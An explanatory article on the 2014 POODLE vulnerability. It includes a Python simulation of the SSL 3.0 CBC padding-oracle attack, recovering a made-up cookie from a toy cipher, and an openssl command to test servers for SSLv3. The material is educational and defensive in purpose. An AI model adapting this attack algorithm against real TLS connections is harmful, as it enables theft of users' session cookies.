POODLE is the latest in a long line of security panics to hit the headlines in 2014. Once the preserve of specialist publications, vulnerabilities now routinely make their way into the mainstream media, often shorn of nuance and context. There is no doubt that Heartbleed and Shellshock were critically serious vulnerabilities, and both were relatively easy to exploit, but can the same be said of POODLE?
POODLE, a silly name derived from a tenuous acronym (Padding Oracle On Downgraded Legacy Encryption), in theory allows an attacker to read the plaintext of a supposedly secure SSL connection.
It relies on two flaws: one in the design of SSL 3.0's padding for block ciphers, and one in the way browsers fall back to older protocol versions when a handshake fails.
SSL 3.0, when used with a cipher in cipher block chaining (CBC) mode, pads each record out to a multiple of the block size because the cipher only works on blocks of a fixed length. The protocol defines only the final padding byte (the padding length); the other padding bytes are arbitrary, and none of the padding is covered by the MAC, so the receiver cannot check it. An attacker who can make the browser send the same secret (typically an authentication cookie) in a position of their choosing, and who can substitute one ciphertext block for another, can then use whether the server accepts or rejects each modified record as an oracle: on average one attempt in 256 is accepted, and each accepted attempt reveals one byte of the secret. If you want to understand the full details take a look at this StackExchange article.
All of which would matter far less if browsers refused to use what has long been known to be a weak protocol. Unfortunately, in an effort to accommodate servers that should have been updated long ago, browsers first try a modern version of TLS but, if the handshake fails, retry with older versions, down to SSL 3.0 if that appears to be all the server supports. A man-in-the-middle does not need to break anything to trigger this: interfering with the TLS handshakes until the browser retries with SSL 3.0 is enough, and from then on the padding weakness above applies to the connection.
Except it isn’t that easy. To use POODLE in the wild the attacker needs to:
- Get between the victim and the server, for example by tricking the user into connecting to a rogue WiFi network.
- Interfere with the handshakes between browser and server so that the browser falls back to SSL 3.0.
- Inject JavaScript into the browser (via any plain HTTP page the victim loads) that makes it send crafted HTTPS requests whose path and body lengths line the secret up with the padding.
- Repeat many times: each accepted request reveals one byte of the secret (usually an authentication cookie), and on average it takes 256 attempts to get one accepted, so a typical cookie needs thousands of requests.
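As an added illustration of the padding oracle described above and of the crafted-request and repeat steps in the list (this is example code written for this page, not code from the POODLE paper, a browser, or any TLS library), the script below simulates an SSL 3.0-style CBC record layer with a toy block cipher and runs the byte-at-a-time recovery against it. The block cipher (a Feistel network built on HMAC-SHA256), the key sizes, the secret value and the `browser`/`server` callbacks are all constructed for the simulation; the record format (data, then MAC, then padding whose only defined byte is the length, with the padding outside the MAC) is the SSL 3.0 behaviour the attack relies on.

```python
import hashlib
import hmac
import os

BLOCK = 16      # cipher block size in bytes
MAC_LEN = 32    # HMAC-SHA256 tag appended to the record data
ROUNDS = 4      # Feistel rounds in the toy block cipher


def _xor(a, b):
    return (int.from_bytes(a, "big") ^ int.from_bytes(b, "big")).to_bytes(len(a), "big")


# Toy 128-bit block cipher: a keyed Feistel network over HMAC-SHA256 (constructed
# stand-in; POODLE depends only on SSL 3.0's CBC padding rules, not on the cipher).
def _round(key, r, half):
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for r in range(ROUNDS):
        left, right = right, _xor(left, _round(key, r, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for r in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, r, left)), left
    return left + right


# SSL 3.0-style record: data || MAC || padding, CBC-encrypted under a fresh IV.
# Padding fills to a block boundary; only its final byte (the padding length)
# is defined, and the padding is not covered by the MAC.
def ssl3_seal(enc_key, mac_key, data):
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()
    pad_len = BLOCK - len(body) % BLOCK                  # 1..16 padding bytes
    body += os.urandom(pad_len - 1) + bytes([pad_len - 1])
    iv = prev = os.urandom(BLOCK)
    ct = b""
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(enc_key, _xor(body[i:i + BLOCK], prev))
        ct += prev
    return iv, ct


def ssl3_open(enc_key, mac_key, iv, ct):
    """Receiver: True if the record is accepted, False if rejected (the oracle)."""
    prev, pt = iv, b""
    for i in range(0, len(ct), BLOCK):
        pt += _xor(block_decrypt(enc_key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    pad_len = pt[-1] + 1
    if pad_len > BLOCK:                 # the only check SSL 3.0 makes on padding
        return False
    data, mac = pt[:-pad_len - MAC_LEN], pt[-pad_len - MAC_LEN:-pad_len]
    return hmac.compare_digest(hmac.new(mac_key, data, hashlib.sha256).digest(), mac)


def poodle_recover(secret_len, browser, server):
    """browser(prefix_len, suffix_len) -> (iv, ct): a fresh request whose plaintext
    is prefix || secret || suffix (path || cookie || body in the real attack).
    server(iv, ct) -> bool: does the server accept the record?
    Returns (recovered secret, number of forged records sent)."""
    recovered, sent = bytearray(), 0
    for k in range(secret_len):
        # Lengths chosen so that secret[k] is the last byte of a block and the
        # record ends with a full block of padding (last plaintext byte == 15).
        prefix_len = BLOCK + (BLOCK - 1 - k) % BLOCK
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK
        t = (prefix_len + k) // BLOCK + 1       # block holding secret[k], 1-based
        while True:
            iv, ct = browser(prefix_len, suffix_len)
            blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            m = len(blocks) - 1                 # index of the all-padding block
            forged = b"".join(blocks[1:m]) + blocks[t]   # replace C_m with C_t
            sent += 1
            if server(iv, forged):
                # Accepted only if D(C_t) ^ C_{m-1} ends in 15, i.e.
                # P_t[15] ^ C_{t-1}[15] ^ C_{m-1}[15] == 15, so solve for P_t[15].
                recovered.append((BLOCK - 1) ^ blocks[t - 1][-1] ^ blocks[m - 1][-1])
                break
            if sent > 200_000:
                raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered), sent


def demo(secret=b"sid=7f3a"):
    """Constructed victim: the cookie value and keys are made up for the simulation."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)

    def browser(prefix_len, suffix_len):   # attacker controls path and body lengths
        return ssl3_seal(enc_key, mac_key, b"/" * prefix_len + secret + b"&" * suffix_len)

    def server(iv, ct):
        return ssl3_open(enc_key, mac_key, iv, ct)

    return poodle_recover(len(secret), browser, server)


if __name__ == "__main__":
    secret, sent = demo()
    print(secret, "recovered after", sent, "forged records")
```

Running it recovers the cookie and reports how many forged records were sent, which averages 256 per byte; that count is where the "repeat many times" step comes from, and every one of those records is a fresh HTTPS request the injected script has to make the browser send. Whether a live server still offers SSL 3.0 at all can be checked with `openssl s_client -ssl3 -connect host:443` on an OpenSSL build that still includes SSLv3 support.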
In conclusion, POODLE is a theoretical vulnerability, worked out from a protocol weakness rather than observed in the wild, and it is unlikely to result in real-life exploits.